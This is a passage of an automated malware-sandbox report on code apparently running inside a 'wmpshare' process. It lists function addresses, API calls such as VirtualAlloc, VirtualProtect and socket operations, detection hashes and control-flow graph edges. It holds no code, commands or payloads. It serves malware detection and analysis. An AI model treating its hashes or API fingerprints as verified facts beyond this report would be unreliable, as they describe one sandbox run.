430->432 433 28186d528ad-28186d528b1 430->433 431->407 434 28186d52823-28186d5282e 432->434 435 28186d5283d 432->435 436 28186d528b3-28186d528bd 433->436 437 28186d528bf-28186d528cc 433->437 438 28186d528a2-28186d528ab 434->438 439 28186d52830-28186d5283b 434->439 440 28186d5283f-28186d52842 435->440 436->437 436->440 441 28186d528ce-28186d528da 437->441 442 28186d528e9-28186d528ed 437->442 438->440 439->434 439->435 440->429 445 28186d52844-28186d5285b 440->445 443 28186d528dc-28186d528e7 441->443 444 28186d528fb-28186d52903 441->444 442->435 446 28186d528f3-28186d528f6 442->446 443->441 443->442 444->440 445->429 446->440
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleSuspendThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1038686644-0
                                                                                                                                        • Opcode ID: e6fc7b403535ff93a9b75229e2f7f673d76738b256c9c6644f28f980537d77ee
                                                                                                                                        • Instruction ID: 4436b59fa9cef6b6d84762b1ebe95f432956a012bd2933551cdeeaeeda715213
                                                                                                                                        • Opcode Fuzzy Hash: e6fc7b403535ff93a9b75229e2f7f673d76738b256c9c6644f28f980537d77ee
                                                                                                                                        • Instruction Fuzzy Hash: B591F13460DA058BFB68DB28C89F27977D5FB59310F148259E08AC7AC6DE24D857CF82
                                                                                                                                        Function 00007DF4741B2E90 Relevance: 3.0, APIs: 2, Instructions: 40nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3434089996.00007DF4741B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4741B1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_7df4741b1000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationQuerySystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3562636166-0
                                                                                                                                        • Opcode ID: d6f0361b43dcc020633b7375cad3ade070dfb937504ad58392e1959d295d159c
                                                                                                                                        • Instruction ID: 4e0e0d57bb6bc9da594f8c109a757f044179449ec2579531690d341bea55935a
                                                                                                                                        • Opcode Fuzzy Hash: d6f0361b43dcc020633b7375cad3ade070dfb937504ad58392e1959d295d159c
                                                                                                                                        • Instruction Fuzzy Hash: 390119347199858FE798EB24EC5CAA677E1FBE8301F584069A44BC21A0DE38D605CB42
                                                                                                                                        Function 00007DF4741E25D4 Relevance: 3.0, APIs: 2, Instructions: 40nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3434241766.00007DF4741E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4741E1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_7df4741e1000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationQuerySystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3562636166-0
                                                                                                                                        • Opcode ID: aef705ebc4d608f27ba9e125c208f2bfcfdfb1cc7e38d7701445699f42369a9a
                                                                                                                                        • Instruction ID: 45d571beecbef3952d81745052d513702af9e9f091ad8404e6ad5ae8ea10232a
                                                                                                                                        • Opcode Fuzzy Hash: aef705ebc4d608f27ba9e125c208f2bfcfdfb1cc7e38d7701445699f42369a9a
                                                                                                                                        • Instruction Fuzzy Hash: 32013134618945CFF785FB25DC68B6677E1FBA8301F44456DA48BC21A0DF78D684CB41
                                                                                                                                        Function 00007DF4742022CC Relevance: 2.0, APIs: 1, Instructions: 450timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3434396750.00007DF474201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF474201000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_7df474201000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FunctionProtectTableTimerVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2248422592-0
                                                                                                                                        • Opcode ID: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
                                                                                                                                        • Instruction ID: 89f1a0aa6df1590b284766ada0e80f91888fd08abc5756a89f5772681b9ec0e2
                                                                                                                                        • Opcode Fuzzy Hash: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
                                                                                                                                        • Instruction Fuzzy Hash: FCE17330608A588FDB59EF28D8885BA77E1FF98340F14496FD48BC31B1DB39E9558781
                                                                                                                                        Function 0000028186D5C2D0 Relevance: 1.9, APIs: 1, Instructions: 699memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 41294f9132f532288ebac11fc5ffb7e2a185503835a2c4f2160672799294d73b
                                                                                                                                        • Instruction ID: ea9559960398ea6d44a490d3ba68b52d01d509213af365acaa3e6bf082c09c85
                                                                                                                                        • Opcode Fuzzy Hash: 41294f9132f532288ebac11fc5ffb7e2a185503835a2c4f2160672799294d73b
                                                                                                                                        • Instruction Fuzzy Hash: 7522343461CA980EE72C9B18988E7B977D4F789301F24476EE4DBC21D3EE24D5578B82
                                                                                                                                        Function 0000028186D62EC8 Relevance: 1.8, APIs: 1, Instructions: 260nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AcceptConnectPort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1658770261-0
                                                                                                                                        • Opcode ID: 477f8dc71d31783f34f9248ca41e69be52e3134fae9b2781e769503cf8821e2c
                                                                                                                                        • Instruction ID: 0c78bdd684808b19fb80f6dea971232d45a62536002dd6a78cbd3b9fda38c781
                                                                                                                                        • Opcode Fuzzy Hash: 477f8dc71d31783f34f9248ca41e69be52e3134fae9b2781e769503cf8821e2c
                                                                                                                                        • Instruction Fuzzy Hash: A181C13920DA498BF764DB19948EB6AB3D8EB94300F51D719E486C32C2DF64DC168BC2
                                                                                                                                        Function 0000028186D62CAC Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AcceptConnectPort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1658770261-0
                                                                                                                                        • Opcode ID: 3e504d11f5da52f1af1682200719c15ad2bad24be6b07785b1bf4d7c48f26462
                                                                                                                                        • Instruction ID: bc889e51eaad7263073e123b21b0d5e3df33d25abb9e9cd22207957a01968b3c
                                                                                                                                        • Opcode Fuzzy Hash: 3e504d11f5da52f1af1682200719c15ad2bad24be6b07785b1bf4d7c48f26462
                                                                                                                                        • Instruction Fuzzy Hash: 7EF0B774A1CB848FEB64EF2CD489B5977E0FBA9300F508519E88CC3285EA3498418B86
                                                                                                                                        Function 0000028186D62E84 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AcceptConnectPort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1658770261-0
                                                                                                                                        • Opcode ID: a3b54702dbe03003ef4b69b8382696d02528a9294142f6c5061081efdfa68d71
                                                                                                                                        • Instruction ID: c9645d636b54c0f83d21e4d87baaa4b937aeb3f4f69638f52412c3a36e5c6e8f
                                                                                                                                        • Opcode Fuzzy Hash: a3b54702dbe03003ef4b69b8382696d02528a9294142f6c5061081efdfa68d71
                                                                                                                                        • Instruction Fuzzy Hash: 1EE09B752096048FDB00DF94CCC6969B7E4E7E5305F404D39E84ACA165D674D959CB82
                                                                                                                                        Function 0000028186D62A20 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AcceptConnectPort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1658770261-0
                                                                                                                                        • Opcode ID: 62332437ee16da287e3653c526f206484f17471112b3976b2a00ba68a8ac2207
                                                                                                                                        • Instruction ID: fb84f570a8016467939f46e09a332e1d4508cfc7a80a00c73ef75087bc91fae2
                                                                                                                                        • Opcode Fuzzy Hash: 62332437ee16da287e3653c526f206484f17471112b3976b2a00ba68a8ac2207
                                                                                                                                        • Instruction Fuzzy Hash: F9D01238A187458BE610AB288446A097BE1F7DA314F548618E8C483361E679D8518BC7
                                                                                                                                        Function 0000028186D62DAC Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AcceptConnectPort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1658770261-0
                                                                                                                                        • Opcode ID: f3aebb9c130a7595b6eefcdad82ea6d301f140e42f53323116d57528b48ef3ee
                                                                                                                                        • Instruction ID: bbb3f1cb2059710fe68f75e11b9391dd689aef467e8436321f91914ab21c1bc1
                                                                                                                                        • Opcode Fuzzy Hash: f3aebb9c130a7595b6eefcdad82ea6d301f140e42f53323116d57528b48ef3ee
                                                                                                                                        • Instruction Fuzzy Hash: 96D01238A187498BE710AB2895466097BE1FBDA314F544B1CE88483350E639D8558BC6
                                                                                                                                        Function 0000028186D62D80 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AcceptConnectPort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1658770261-0
                                                                                                                                        • Opcode ID: 89f4a05ad4cf7a5c42d1f7300e09080cac91406142c330baf98efa371945559f
                                                                                                                                        • Instruction ID: 7edca24fe0202799dd17b3b4548b55e7a959414b2fe2f6cf77f1dba4de80dcf6
                                                                                                                                        • Opcode Fuzzy Hash: 89f4a05ad4cf7a5c42d1f7300e09080cac91406142c330baf98efa371945559f
                                                                                                                                        • Instruction Fuzzy Hash: 3FD05E28A28A898BEA50A728890670537E1FBD6304F918718E888C3244EA2DD8518BC7
                                                                                                                                        Function 0000028186D6290C Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AcceptConnectPort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1658770261-0
                                                                                                                                        • Opcode ID: ea9358fbe28cd15c97578867be2afda9ae4f1a6df4f19420141c692e89a91aba
                                                                                                                                        • Instruction ID: 3bdc78f17c3bc87cc11bc80f13c261de93e4c13642ed40d01a2fa08164ad823c
                                                                                                                                        • Opcode Fuzzy Hash: ea9358fbe28cd15c97578867be2afda9ae4f1a6df4f19420141c692e89a91aba
                                                                                                                                        • Instruction Fuzzy Hash: 5CC08C08A6F80A8AFA06A6AA8C8B31430A8A38E308F800100D484C21C0EC0DC8A147D2
                                                                                                                                        Function 0000028186D62DDC Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,0000028186D55367), ref: 0000028186D62DEC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AcceptConnectPort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1658770261-0
                                                                                                                                        • Opcode ID: 09515c4071d5cd1d26304305e5d382a5795874c756b6f30558b0c1d7e16e0e91
                                                                                                                                        • Instruction ID: 6904d25e2cc0b37322ee956b992e2cc669a46b4ce12904f16c1ec3b4f038e817
                                                                                                                                        • Opcode Fuzzy Hash: 09515c4071d5cd1d26304305e5d382a5795874c756b6f30558b0c1d7e16e0e91
                                                                                                                                        • Instruction Fuzzy Hash: 21C08C1861E80B8BF914626E4CCB7142084AB8E384F804100E404C21C4FC0CC8A15BDA
                                                                                                                                        Function 00007DF474201438 Relevance: 6.1, APIs: 4, Instructions: 134registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000003.3152628101.00007DF474201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF474201000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_3_7df474201000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseInformationOpenQueryValueVolume
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4069062851-0
                                                                                                                                        • Opcode ID: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
                                                                                                                                        • Instruction ID: 0d32ae90af315452b4bc311907605152610f6230ad521677cca9baa6014a33e1
                                                                                                                                        • Opcode Fuzzy Hash: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
                                                                                                                                        • Instruction Fuzzy Hash: DA41213051CA488BE755EB24C499BEBB7F1FB94341F404A2EE58BC61A1EF79D504CB81
                                                                                                                                        Function 00007DF4741B8C38 Relevance: 6.1, APIs: 4, Instructions: 130networkCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3434089996.00007DF4741B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4741B1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_7df4741b1000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: socket$ErrorModeclosesocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2183620661-0
                                                                                                                                        • Opcode ID: 86a7dbef4beb537d1f960ef4159f5a72687c895cdfeef9c93758c5432ac85e68
                                                                                                                                        • Instruction ID: 73cf46c0a0e657960c2d39c5ee82af8eefef046b8b1510290861ddee4c97f0ba
                                                                                                                                        • Opcode Fuzzy Hash: 86a7dbef4beb537d1f960ef4159f5a72687c895cdfeef9c93758c5432ac85e68
                                                                                                                                        • Instruction Fuzzy Hash: 9F41663061C748CFE758EF28D8585AA77E1FB98300F54862DE09BC32A1DF789645CB81
                                                                                                                                        Function 0000028186D684C0 Relevance: 6.1, APIs: 4, Instructions: 130networkCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: socket$ErrorModegetsockopt
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 552242919-0
                                                                                                                                        • Opcode ID: f4e6771871a383ecd65cf7c786fccd009df30cb3b3764fe840cb75ff13171734
                                                                                                                                        • Instruction ID: d86000585b7f7fa8e820601b2fece90bce2575dc473604f84e0565728d2be034
                                                                                                                                        • Opcode Fuzzy Hash: f4e6771871a383ecd65cf7c786fccd009df30cb3b3764fe840cb75ff13171734
                                                                                                                                        • Instruction Fuzzy Hash: 2A41B574218A488FE758EF28D85D96A77E1FB99300F50462DE48BC32A1DF389815CB81
                                                                                                                                        Function 0000028186D5E2A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                        • String ID: rE\
                                                                                                                                        • API String ID: 544645111-988334199
                                                                                                                                        • Opcode ID: 75d6d8eb26df1a839d51af674b3d6b425c3a8640e6788e6840d12e792dd5345f
                                                                                                                                        • Instruction ID: 4e682c4c9a1a5ce6ba3fb304f56012b960247e147df6cbdfef3281bdb7736c5e
                                                                                                                                        • Opcode Fuzzy Hash: 75d6d8eb26df1a839d51af674b3d6b425c3a8640e6788e6840d12e792dd5345f
                                                                                                                                        • Instruction Fuzzy Hash: 8011C4353089094BFB45F758A89FBB972DAF7D8300F405229A44FC32C3EE28C9568B81
                                                                                                                                        Function 0000028186D5BC64 Relevance: 4.6, APIs: 3, Instructions: 110fileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseHandleMappingOpenView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2553196624-0
                                                                                                                                        • Opcode ID: e5e44baeb6ac7a5ef2abf0622d7dcda60392d94986a7d3768f6014d184717f4c
                                                                                                                                        • Instruction ID: 2dff370d3a01aabe38ec4ebe0ff8fc3b5ba39fdfa151951257ffcbb62f0d035f
                                                                                                                                        • Opcode Fuzzy Hash: e5e44baeb6ac7a5ef2abf0622d7dcda60392d94986a7d3768f6014d184717f4c
                                                                                                                                        • Instruction Fuzzy Hash: DC31853521994C4FEB55EF24D48E6EAB3E9FB94300F50862AE88BC31D2DE30D9558B81
                                                                                                                                        Function 0000028186D5BA4C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateWindow
                                                                                                                                        • String ID: P
                                                                                                                                        • API String ID: 716092398-3110715001
                                                                                                                                        • Opcode ID: cfa3f0b6778a70b443997505d324e50d054ac30842702c4c9102a20ff55eb27d
                                                                                                                                        • Instruction ID: c74ea89c69b3bd8f1d3646c66f03477e7341c7dcb1bdc7a068386c29a3c22090
                                                                                                                                        • Opcode Fuzzy Hash: cfa3f0b6778a70b443997505d324e50d054ac30842702c4c9102a20ff55eb27d
                                                                                                                                        • Instruction Fuzzy Hash: 66515270518B848FE765EF24D89A79AB7E5FB94311F10862EE48EC2291DF349445CF83
                                                                                                                                        Function 00007DF4741E47B8 Relevance: 3.3, APIs: 2, Instructions: 339windowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 297 7df4741e47b8-7df4741e47f0 call 7df4741e1478 300 7df4741e4b0d-7df4741e4b32 call 7df4741e55b0 297->300 301 7df4741e47f6-7df4741e480e call 7df4741e1538 297->301 301->300 306 7df4741e4814-7df4741e4845 call 7df4741e1708 call 7df4741e1740 call 7df4741e1818 301->306 306->300 314 7df4741e484b-7df4741e485d 306->314 314->300 316 7df4741e4863-7df4741e4880 314->316 318 7df4741e4958-7df4741e4a0d call 7df4741edb48 call 7df4741e28d4 call 7df4741edb72 call 7df4741edb6c call 7df4741edb66 SendMessageA 316->318 319 7df4741e4886-7df4741e48f6 call 7df4741edb48 * 3 316->319 360 7df4741e4a12-7df4741e4a18 318->360 337 7df4741e4953-7df4741e4956 319->337 337->318 340 7df4741e48f8-7df4741e48fb 337->340 341 7df4741e48fd-7df4741e4901 340->341 342 7df4741e4909-7df4741e4921 calloc 340->342 341->342 344 7df4741e4903-7df4741e4907 341->344 345 7df4741e4a7e 342->345 346 7df4741e4927-7df4741e4945 call 7df4741e55d0 342->346 344->342 348 7df4741e4950-7df4741e4951 344->348 351 7df4741e4a87-7df4741e4a8a 345->351 356 7df4741e4a5c-7df4741e4a60 346->356 357 7df4741e494b-7df4741e494c 346->357 348->337 354 7df4741e4a8c-7df4741e4a8f 351->354 355 7df4741e4af5-7df4741e4af6 351->355 358 7df4741e4a91-7df4741e4ab4 call 7df4741edb48 354->358 359 7df4741e4ade 354->359 364 7df4741e4afe-7df4741e4b08 call 7df4741e2730 355->364 361 7df4741e4a62-7df4741e4a66 356->361 362 7df4741e4a6b-7df4741e4a6f 356->362 363 7df4741e494e 357->363 376 7df4741e4abe-7df4741e4ad6 call 7df4741edb48 358->376 377 7df4741e4ab6-7df4741e4abc 358->377 367 7df4741e4ae0-7df4741e4af3 359->367 360->364 366 7df4741e4a1e-7df4741e4a24 360->366 361->363 362->363 368 7df4741e4a75-7df4741e4a79 362->368 363->348 364->300 366->364 371 7df4741e4a2a-7df4741e4a3e 366->371 367->351 367->355 368->363 371->364 378 7df4741e4a44-7df4741e4a57 call 7df4741e55d0 371->378 376->359 377->359 378->367
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3434241766.00007DF4741E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4741E1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_7df4741e1000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FunctionMessageProtectSendTableVirtualcalloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2453823186-0
                                                                                                                                        • Opcode ID: f21b9ec484d8d2d9b9243406eb49c24197b694a35871426f8b048c7a46f2aacc
                                                                                                                                        • Instruction ID: 74656998014dd14a6f93cea0f426f4e477d7c4607a780012ef462a2d66b8f282
                                                                                                                                        • Opcode Fuzzy Hash: f21b9ec484d8d2d9b9243406eb49c24197b694a35871426f8b048c7a46f2aacc
                                                                                                                                        • Instruction Fuzzy Hash: 63B13F3561CA588BDB54FF34D4985BB73E1EB94311F504A3AE08BC31A2EE78EA4587C1
                                                                                                                                        Function 00007DF4741B4290 Relevance: 3.2, APIs: 2, Instructions: 244windowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3434089996.00007DF4741B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4741B1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_7df4741b1000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FunctionMessageProtectSendTableVirtualcalloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2453823186-0
                                                                                                                                        • Opcode ID: 9476529166d77aa32403f16abccb553efbe971cbc2abc63400368bf18a283a5f
                                                                                                                                        • Instruction ID: 466796928eb0df0100710fd803d7d6c613eb1957cf707fed8fa4dc300ccf4656
                                                                                                                                        • Opcode Fuzzy Hash: 9476529166d77aa32403f16abccb553efbe971cbc2abc63400368bf18a283a5f
                                                                                                                                        • Instruction Fuzzy Hash: 1971413061CA488FDB54FF18D8955AB73E1FB54700B54867AE48BC71A6DA38EA11C7C1
                                                                                                                                        Function 0000028186D522D4 Relevance: 3.2, APIs: 2, Instructions: 222memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 508 28186d522d4-28186d52303 GetSystemInfo 509 28186d52305-28186d52310 508->509 510 28186d52313-28186d52329 508->510 509->510 511 28186d5232f-28186d52332 510->511 512 28186d52334-28186d52337 511->512 513 28186d5234e-28186d52354 511->513 514 28186d52349-28186d5234c 512->514 515 28186d52339-28186d5233c 512->515 516 28186d52356-28186d52366 513->516 517 28186d523cf-28186d523d2 513->517 514->511 515->514 519 28186d5233e-28186d52343 515->519 520 28186d52395-28186d5239b 516->520 518 28186d5245e 517->518 523 28186d52460-28186d52463 518->523 524 28186d5246b-28186d52482 518->524 519->514 525 28186d524b1-28186d524c3 519->525 521 28186d52368-28186d5237f 520->521 522 28186d5239d 520->522 521->522 537 28186d52381-28186d52389 521->537 526 28186d5239f-28186d523a2 522->526 527 28186d523d7-28186d523f5 523->527 528 28186d52469 523->528 529 28186d52484-28186d5249e 524->529 526->517 530 28186d523a4-28186d523c4 VirtualAlloc 526->530 532 28186d52437 527->532 533 28186d523f7-28186d5240e 527->533 528->525 529->529 531 28186d524a0-28186d524ab 529->531 530->524 535 28186d523ca-28186d523cd 530->535 531->525 536 28186d52439-28186d5243c 532->536 533->532 541 28186d52410-28186d52418 533->541 535->516 535->517 536->525 539 28186d5243e-28186d5245c 536->539 537->526 540 28186d5238b-28186d52393 537->540 539->518 540->520 540->522 541->536 542 28186d5241a-28186d52435 541->542 542->532 542->533
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocInfoSystemVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3440192736-0
